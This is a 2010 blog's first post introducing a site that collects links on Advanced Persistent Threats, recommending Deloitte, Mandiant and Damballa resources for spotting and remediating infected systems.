<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-31281395476587482922010-03-26T14:56:00.000-07:002011-11-19T13:03:07.041-08:00First blog, first post...<span style="font-size:100%;"><span style="font-family:arial;">This is yet another blog about <a href="http://en.wikipedia.org/wiki/Advanced_Persistent_Threat">APT</a> (if you don't know what this stands for, you're in the wrong place or need to read on).</span><span style="font-family:arial;">
<br />
<br />It's dedicated to share interesting (in my opinion) links to APT resources, and some of the most interesting facts of each link (only when I have spare time).</span><span style="font-family:arial;">
<br />
<br />The blog title should be a word game from "capture the APT". The main topic will be how to be able to identify (and maybe remediate) APT infected systems.</span><span style="font-family:arial;">
<br />
<br />If you have suggestions for additional resources or if you find incorrect facts on here, please email me (</span><span class="login" style="font-family:arial;">toms.security.stuff@gmail.tld -- you should know the TLD of gmail, starts with a 'C' and ends with 'OM').</span><span style="font-family:arial;">
<br />
<br />Here's an interesting paper from Deloitte: </span>
<br /><a style="font-family: arial;" href="http://www.deloitte.com/assets/Dcom-UnitedStates/Local%20Assets/Documents/AERS/us_aers_Deloitte%20Cyber%20Crime%20POV%20Jan252010.pdf">Cyber crime: a clear and present danger -- Combating the fastest growing cyber security threat</a><span style="font-family:arial;">
<br />
<br /><span style="font-family:arial;">One of my favorite sites is the one from </span></span><a style="font-family: arial;" href="http://www.mandiant.com/">Mandiant</a><span style="font-family:arial;"> (not just because of the </span><a style="font-family: arial;" href="http://www.mandiant.com/products/free_software">great free IR tools</a><span style="font-family:arial;"> they offer). They also have </span><a style="font-family: arial;" href="http://www.mandiant.com/services/advanced_persistent_threat">services about APT</a><span style="font-family:arial;"> and the </span><a style="font-family: arial;" href="http://www.mandiant.com/products/services/m-trends">M-Trends report</a><span style="font-family:arial;"> is a good read, too. I can also recommend their <a href="http://blog.mandiant.com/">M-unition blog</a> and their <a href="http://www.mandiant.com/index.php/news_events/presentation_archives">presentations</a>, especially the latest one "<a href="http://www.mandiant.com/presentations/state_of_the_hack_silent_but_deadly/">State of the Hack: Silent But Deadly</a>" from March 11 (slides, video, audio available).
<br />
<br />Another <a href="http://blog.damballa.com/">blog</a> I like to read is from Damballa: <a href="http://blog.damballa.com/?tag=apt">The Day Before Zero</a>
<br />The post "<a href="http://blog.damballa.com/?p=578">The Truth About Two Malware Families Related to Operation Aurora</a>" makes a connection from Fake-AV Malware to <a href="http://en.wikipedia.org/wiki/Operation_Aurora">Operation Aurora</a>. I see lots of Fake-AV events from infected websites and Blackhat SEO Google redirects. Should I be worried now?
<br />
<br />I don't want to spill all the best links at once, so I will write more later...
<br />
<br />Thanks for stopping by and please come back again :-)
<br />
<br />*** Disclaimer: I'm not affiliated with any of the companies linked in this blog.
<br />I won't tell you what company I work for, unless you find out yourself. ***
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/1.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/1.gif" height="1" width="1" /></noscript>
<br /></span>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0